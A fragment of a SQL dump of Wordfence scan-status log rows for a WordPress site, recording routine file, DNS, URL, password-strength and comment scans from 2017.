(117486, 1491988779.327511, 2, 'info', 'Done URL check.'),
(117872, 1492193133.881781, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117737, 1492108243.985362, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117736, 1492108243.707650, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117735, 1492108243.325020, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117734, 1492108243.002350, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117733, 1492108242.538766, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117336, 1491886416.197002, 1, 'info', '-------------------'),
(117171, 1491821921.208183, 2, 'info', 'Getting plugin list from WordPress'),
(117746, 1492108247.380509, 2, 'info', 'Scanned contents of 37 additional files at 18.08 per second'),
(117595, 1492058791.427860, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117594, 1492058791.427471, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117593, 1492058791.420475, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117592, 1492058791.418651, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117130, 1491767411.803117, 2, 'info', 'Done host key check.'),
(117129, 1491767410.905803, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117128, 1491767410.904724, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117127, 1491767410.904217, 2, 'info', 'Scanned contents of 86 additional files at 25.27 per second'),
(117126, 1491767410.627054, 2, 'info', 'Scanned contents of 65 additional files at 20.80 per second'),
(117125, 1491767409.618263, 2, 'info', 'Scanned contents of 37 additional files at 17.48 per second'),
(117123, 1491767407.501026, 2, 'info', 'Starting scan of file contents'),
(117124, 1491767408.569841, 2, 'info', 'Scanned contents of 27 additional files at 25.28 per second'),
(117873, 1492265511.395840, 1, 'info', 'Scheduled Wordfence scan starting at Saturday 15th of April 2017 02:11:51 PM'),
(117394, 1491943543.904454, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117022, 1491750757.329976, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117023, 1491750757.935509, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117883, 1492265523.321940, 2, 'info', 'Getting theme list from WordPress'),
(117882, 1492265523.315458, 2, 'info', 'Found 14 plugins'),
(117881, 1492265523.182227, 2, 'info', 'Getting plugin list from WordPress'),
(117301, 1491886408.760156, 2, 'info', 'Starting scan of file contents'),
(117302, 1491886409.885043, 2, 'info', 'Scanned contents of 28 additional files at 24.90 per second'),
(117242, 1491821943.389909, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117643, 1492072414.029298, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117240, 1491821943.388706, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117241, 1491821943.389393, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117466, 1491988771.792907, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117467, 1491988772.195625, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(116985, 1491702321.878463, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(116986, 1491750737.862409, 1, 'info', 'Scheduled Wordfence scan starting at Sunday 9th of April 2017 03:12:17 PM'),
(117389, 1491943540.937646, 2, 'info', 'Starting scan of file contents'),
(117692, 1492072423.952370, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 44034 records in 26 seconds.'),
(117961, 1492280399.891686, 1, 'info', 'Scheduled Wordfence scan starting at Saturday 15th of April 2017 06:19:59 PM'),
(117691, 1492072423.951633, 1, 'info', '-------------------'),
(118063, 1492290928.454161, 10, 'info', 'SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),
(117964, 1492280402.714121, 10, 'info', 'SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),
(117962, 1492280400.703725, 10, 'info', 'SUM_PREP:Preparing a new scan.'),
(117963, 1492280400.713547, 10, 'info', 'SUM_PAIDONLY:Remote scan of public facing site only available to paid members'),
(118110, 1492290940.528449, 10, 'info', 'SUM_ENDOK:Scanning files for URLs in Google\'s Safe Browsing List'),
(118105, 1492290939.650664, 2, 'info', 'Done host key check.'),
(118106, 1492290939.652107, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(118107, 1492290940.498560, 2, 'info', 'Done URL check.'),
(118108, 1492290940.523701, 2, 'info', 'Done file contents scan'),
(118109, 1492290940.524867, 10, 'info', 'SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),
(117007, 1491750752.976021, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(118111, 1492290940.533902, 10, 'info', 'SUM_START:Scanning posts for URL\'s in Google\'s Safe Browsing List'),
(118112, 1492290940.569567, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117827, 1492193125.165374, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117826, 1492193124.940903, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117988, 1492280416.799039, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far');
INSERT INTO `wp_wfStatus` (`id`, `ctime`, `level`, `type`, `msg`) VALUES
(118053, 1492290917.292862, 10, 'info', 'SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),
(118052, 1492290915.292044, 10, 'info', 'SUM_PAIDONLY:Remote scan of public facing site only available to paid members'),
(118051, 1492290915.280049, 10, 'info', 'SUM_PREP:Preparing a new scan.'),
(118045, 1492280433.227613, 10, 'info', 'SUM_ENDBAD:Scanning for old themes, plugins and core files'),
(118046, 1492280433.390833, 1, 'info', '-------------------'),
(118047, 1492280433.391432, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 44405 records in 33 seconds.'),
(118048, 1492280433.392045, 10, 'info', 'SUM_FINAL:Scan complete. You have 6 new issues to fix. See below.'),
(118049, 1492280433.397104, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(118050, 1492290914.657453, 1, 'info', 'Scheduled Wordfence scan starting at Saturday 15th of April 2017 09:15:14 PM'),
(117729, 1492108239.315303, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117728, 1492108239.007580, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117727, 1492108238.644110, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117726, 1492108237.809250, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117347, 1491943529.320003, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117348, 1491943530.168182, 2, 'info', 'Getting plugin list from WordPress'),
(117349, 1491943530.188059, 2, 'info', 'Found 14 plugins'),
(117350, 1491943530.191121, 2, 'info', 'Getting theme list from WordPress'),
(117351, 1491943530.224475, 2, 'info', 'Found 4 themes'),
(117725, 1492108237.226177, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117720, 1492108235.216785, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117721, 1492108235.546115, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117722, 1492108236.118559, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117723, 1492108236.659095, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117724, 1492108236.828102, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117928, 1492265541.054550, 2, 'info', 'Done host key check.'),
(117927, 1492265540.183698, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117926, 1492265540.182679, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117290, 1491886406.225370, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117925, 1492265540.182239, 2, 'info', 'Scanned contents of 86 additional files at 27.39 per second'),
(117616, 1492072407.479072, 2, 'info', 'Getting theme list from WordPress'),
(117382, 1491943539.790269, 2, 'info', 'Analyzed 2300 files containing 34.89 MB of data so far'),
(117614, 1492072407.463338, 2, 'info', 'Getting plugin list from WordPress'),
(117615, 1492072407.475657, 2, 'info', 'Found 14 plugins'),
(117732, 1492108241.311849, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117339, 1491886416.202719, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117397, 1491943545.611815, 2, 'info', 'Done URL check.'),
(117398, 1491943545.630153, 2, 'info', 'Done file contents scan'),
(117396, 1491943544.768045, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117019, 1491750756.080231, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117018, 1491750755.649749, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117138, 1491767412.771382, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117137, 1491767412.770301, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117581, 1492058789.163767, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117582, 1492058790.034789, 2, 'info', 'Done host key check.'),
(117583, 1492058790.035270, 2, 'info', 'Done examining URls'),
(117330, 1491886415.735703, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117781, 1492108252.947596, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 43987 records in 34 seconds.'),
(117110, 1491767401.295601, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117638, 1492072413.054638, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117639, 1492072413.181430, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117640, 1492072413.301697, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(118237, 1497408788.236219, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117641, 1492072413.473093, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117642, 1492072413.633690, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(118116, 1492290941.428297, 10, 'info', 'SUM_ENDOK:Scanning posts for URL\'s in Google\'s Safe Browsing List'),
(118113, 1492290940.570501, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(118114, 1492290941.405551, 2, 'info', 'Done host key check.'),
(118115, 1492290941.406196, 2, 'info', 'Done examining URls'),
(117187, 1491821925.997214, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117188, 1491821926.331403, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117631, 1492072411.549027, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117630, 1492072411.412284, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117468, 1491988772.455773, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117469, 1491988772.932955, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117470, 1491988773.197536, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117471, 1491988773.498620, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117472, 1491988773.557609, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117807, 1492193116.818908, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117806, 1492193116.603433, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(118233, 1495637412.343315, 2, 'info', 'Checking 5 host keys against Wordfence scanning servers.'),
(118234, 1496619829.233228, 2, 'info', 'Scanning comment with Author: Sarah Hughes Email: lnuawlisx@jdiszkxd.com Source IP: 209.197.6.138 '),
(118235, 1496619829.303494, 2, 'info', 'Checking 4 host keys against Wordfence scanning servers.'),
(117436, 1491988758.152260, 2, 'info', 'Getting plugin list from WordPress'),
(117435, 1491988757.314840, 1, 'info', 'Contacting Wordfence to initiate scan'),
(118142, 1492320235.522892, 10, 'info', 'SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),
(118143, 1492320237.532633, 10, 'info', 'SUM_START:Scanning your site for the HeartBleed vulnerability'),
(118144, 1492320241.235454, 10, 'info', 'SUM_ENDOK:Scanning your site for the HeartBleed vulnerability'),
(118145, 1492320241.238419, 1, 'info', 'Contacting Wordfence to initiate scan'),
(116995, 1491750749.411424, 2, 'info', 'Found 14 plugins'),
(117437, 1491988758.179815, 2, 'info', 'Found 14 plugins'),
(116996, 1491750749.419369, 2, 'info', 'Getting theme list from WordPress'),
(117817, 1492193120.502563, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117818, 1492193120.688105, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117439, 1491988758.225525, 2, 'info', 'Found 4 themes'),
(117438, 1491988758.184800, 2, 'info', 'Getting theme list from WordPress'),
(117745, 1492108246.345004, 2, 'info', 'Scanned contents of 27 additional files at 26.69 per second'),
(117813, 1492193118.808720, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117814, 1492193119.117051, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117153, 1491767415.058257, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117152, 1491767415.057800, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117151, 1491767415.057255, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117314, 1491886413.641605, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117315, 1491886413.643619, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117316, 1491886414.479449, 2, 'info', 'Done host key check.'),
(117317, 1491886414.480288, 2, 'info', 'Done examining URls'),
(117322, 1491886414.566322, 2, 'info', 'Starting password strength check on 3 users.'),
(117739, 1492108244.431033, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117738, 1492108244.375951, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117325, 1491886415.723970, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(117326, 1491886415.724786, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117327, 1491886415.726248, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117073, 1491750769.612638, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117015, 1491750754.836389, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117014, 1491750754.678042, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117329, 1491886415.735389, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117017, 1491750755.304840, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117016, 1491750755.088382, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117835, 1492193128.215132, 2, 'info', 'Scanned contents of 39 additional files at 18.42 per second'),
(117834, 1492193127.213893, 2, 'info', 'Scanned contents of 28 additional files at 25.09 per second'),
(117833, 1492193126.097107, 2, 'info', 'Starting scan of file contents'),
(117118, 1491767406.563189, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117117, 1491767406.457467, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117116, 1491767405.956045, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117115, 1491767405.502892, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117111, 1491767402.566552, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117112, 1491767403.882540, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117113, 1491767404.349534, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117114, 1491767404.965662, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117481, 1491988777.612263, 2, 'info', 'Scanned contents of 86 additional files at 27.60 per second'),
(116997, 1491750749.489993, 2, 'info', 'Found 4 themes'),
(117427, 1491943547.796152, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117380, 1491943539.286604, 2, 'info', 'Analyzed 2100 files containing 33.39 MB of data so far'),
(117973, 1492280410.980024, 10, 'info', 'SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),
(117379, 1491943539.059294, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117681, 1492072423.827095, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117971, 1492280410.958729, 2, 'info', 'Getting theme list from WordPress'),
(117972, 1492280410.960949, 2, 'info', 'Found 4 themes'),
(117970, 1492280410.953797, 2, 'info', 'Found 14 plugins'),
(117677, 1492072422.657611, 2, 'info', 'Starting password strength check on 3 users.'),
(117969, 1492280410.923591, 2, 'info', 'Getting plugin list from WordPress'),
(117968, 1492280410.048818, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117680, 1492072423.825910, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(118207, 1492320259.647722, 10, 'info', 'SUM_START:Scanning for weak passwords'),
(118206, 1492320259.643344, 10, 'info', 'SUM_ENDOK:Scanning comments for URL\'s in Google\'s Safe Browsing List'),
(117131, 1491767411.804259, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117393, 1491943543.903259, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117392, 1491943543.902830, 2, 'info', 'Scanned contents of 85 additional files at 28.67 per second'),
(117234, 1491821942.246630, 2, 'info', 'Starting password strength check on 3 users.'),
(117670, 1492072421.443399, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117671, 1492072422.563726, 2, 'info', 'Done host key check.'),
(117672, 1492072422.564498, 2, 'info', 'Done examining URls'),
(117974, 1492280412.466574, 10, 'info', 'SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),
(117203, 1491821933.730908, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117201, 1491821933.146682, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117202, 1491821933.474340, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117459, 1491988766.982472, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117458, 1491988766.401645, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117457, 1491988765.819099, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117456, 1491988765.578446, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117455, 1491988764.924772, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117454, 1491988764.314949, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117453, 1491988763.933457, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117449, 1491988761.975355, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117450, 1491988762.464391, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(117451, 1491988763.127799, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117452, 1491988763.547743, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117060, 1491750769.513627, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117719, 1492108234.947492, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117059, 1491750769.512768, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(118043, 1492280433.200624, 10, 'info', 'SUM_ENDOK:Scanning to check available disk space'),
(118099, 1492290935.748904, 2, 'info', 'Starting scan of file contents'),
(118100, 1492290936.816577, 2, 'info', 'Scanned contents of 28 additional files at 26.24 per second'),
(118101, 1492290937.826494, 2, 'info', 'Scanned contents of 40 additional files at 19.26 per second'),
(118102, 1492290938.772616, 2, 'info', 'Scanned contents of 86 additional files at 28.45 per second'),
(117634, 1492072412.103961, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(118093, 1492290934.774034, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117071, 1491750769.608178, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 44134 records in 30 seconds.'),
(118165, 1492320247.688144, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(118166, 1492320248.049489, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117030, 1491750761.718118, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(118169, 1492320248.941566, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(118170, 1492320249.322930, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117859, 1492193133.303087, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117860, 1492193133.304871, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117861, 1492193133.318723, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117862, 1492193133.319264, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117858, 1492193133.302140, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(117574, 1492058788.232664, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117573, 1492058788.231364, 2, 'info', 'Done host key check.'),
(117570, 1492058787.350698, 2, 'info', 'Scanned contents of 86 additional files at 25.72 per second'),
(117571, 1492058787.352420, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117572, 1492058787.354560, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117863, 1492193133.319704, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117140, 1491767413.628174, 2, 'info', 'Done examining URls'),
(117139, 1491767413.626814, 2, 'info', 'Done host key check.'),
(117029, 1491750761.689965, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117644, 1492072414.450618, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117646, 1492072414.829213, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117645, 1492072414.680662, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117238, 1491821943.371512, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117239, 1491821943.375788, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(118139, 1492320231.488632, 10, 'info', 'SUM_PREP:Preparing a new scan.'),
(118140, 1492320231.519292, 10, 'info', 'SUM_PAIDONLY:Remote scan of public facing site only available to paid members'),
(117958, 1492265544.757927, 1, 'info', 'Scan Complete. Scanned 2413 files, 14 plugins, 4 themes, 11 pages, 145 comments and 44538 records in 32 seconds.'),
(118226, 1493013113.072155, 2, 'info', 'Scanning comment with Author: Elisa Brown Email: leyswgiuz@mrflazu.com Source IP: 81.171.97.125 '),
(117957, 1492265544.757502, 1, 'info', '-------------------'),
(117189, 1491821926.721731, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117190, 1491821927.140517, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117191, 1491821927.485144, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117192, 1491821927.684650, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117959, 1492265544.758313, 10, 'info', 'SUM_FINAL:Scan complete. You have 6 new issues to fix. See below.'),
(117960, 1492265544.762000, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117605, 1492058791.954996, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117606, 1492072396.633690, 1, 'info', 'Scheduled Wordfence scan starting at Thursday 13th of April 2017 08:33:16 AM'),
(118009, 1492280425.125035, 10, 'info', 'SUM_START:Scanning files for URLs in Google\'s Safe Browsing List'),
(118008, 1492280425.121561, 10, 'info', 'SUM_START:Scanning file contents for infections and vulnerabilities'),
(118007, 1492280425.093286, 10, 'info', 'SUM_ENDOK:Scanning for known malware files'),
(117163, 1491821909.618642, 1, 'info', 'Scheduled Wordfence scan starting at Monday 10th of April 2017 10:58:29 AM'),
(118056, 1492290925.037123, 10, 'info', 'SUM_ENDOK:Scanning your site for the HeartBleed vulnerability'),
(118055, 1492290921.304414, 10, 'info', 'SUM_START:Scanning your site for the HeartBleed vulnerability'),
(117480, 1491988777.609725, 2, 'info', 'Scanned contents of 86 additional files at 27.62 per second'),
(118031, 1492280432.112221, 10, 'info', 'SUM_START:Scanning for weak passwords'),
(118032, 1492280432.115079, 2, 'info', 'Starting password strength check on 3 users.'),
(117561, 1492058783.079761, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117479, 1491988776.584893, 2, 'info', 'Scanned contents of 39 additional files at 18.67 per second'),
(117477, 1491988774.494882, 2, 'info', 'Starting scan of file contents'),
(117478, 1491988775.547296, 2, 'info', 'Scanned contents of 28 additional files at 26.64 per second'),
(116982, 1491702321.868214, 1, 'info', '-------------------'),
(116983, 1491702321.869144, 1, 'info', 'Scan Complete. Scanned 2413 files, 14 plugins, 4 themes, 11 pages, 145 comments and 43862 records in 34 seconds.'),
(117252, 1491886383.194369, 1, 'info', 'Scheduled Wordfence scan starting at Tuesday 11th of April 2017 04:53:03 AM'),
(116971, 1491702321.301605, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(116972, 1491702321.302322, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(116973, 1491702321.306007, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(116974, 1491702321.313586, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(116975, 1491702321.314284, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(116976, 1491702321.314763, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117772, 1492108252.880536, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117773, 1492108252.881029, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117774, 1492108252.881406, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117836, 1492193129.267133, 2, 'info', 'Scanned contents of 86 additional files at 27.14 per second'),
(118137, 1492290942.764713, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(118138, 1492320230.730340, 1, 'info', 'Scheduled Wordfence scan starting at Sunday 16th of April 2017 05:23:50 AM'),
(117217, 1491821938.982438, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117218, 1491821938.984399, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117216, 1491821938.981949, 2, 'info', 'Scanned contents of 86 additional files at 26.72 per second'),
(117215, 1491821938.979362, 2, 'info', 'Scanned contents of 86 additional files at 26.74 per second'),
(117214, 1491821937.950023, 2, 'info', 'Scanned contents of 39 additional files at 17.84 per second'),
(117213, 1491821936.857880, 2, 'info', 'Scanned contents of 28 additional files at 25.59 per second'),
(118037, 1492280433.178924, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117212, 1491821935.762637, 2, 'info', 'Starting scan of file contents'),
(118035, 1492280433.175133, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(118036, 1492280433.176128, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117993, 1492280419.011346, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117613, 1492072406.591878, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117994, 1492280419.357399, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117995, 1492280419.590116, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117996, 1492280419.928479, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117997, 1492280420.383053, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117998, 1492280421.419171, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117999, 1492280422.608813, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(118000, 1492280423.446765, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(118001, 1492280423.738092, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(118002, 1492280424.164657, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(118003, 1492280424.594735, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(118004, 1492280425.020011, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(118057, 1492290925.040585, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117904, 1492265530.323893, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117898, 1492265528.342211, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117899, 1492265528.643364, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117900, 1492265529.075023, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117901, 1492265529.404778, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117902, 1492265529.557542, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
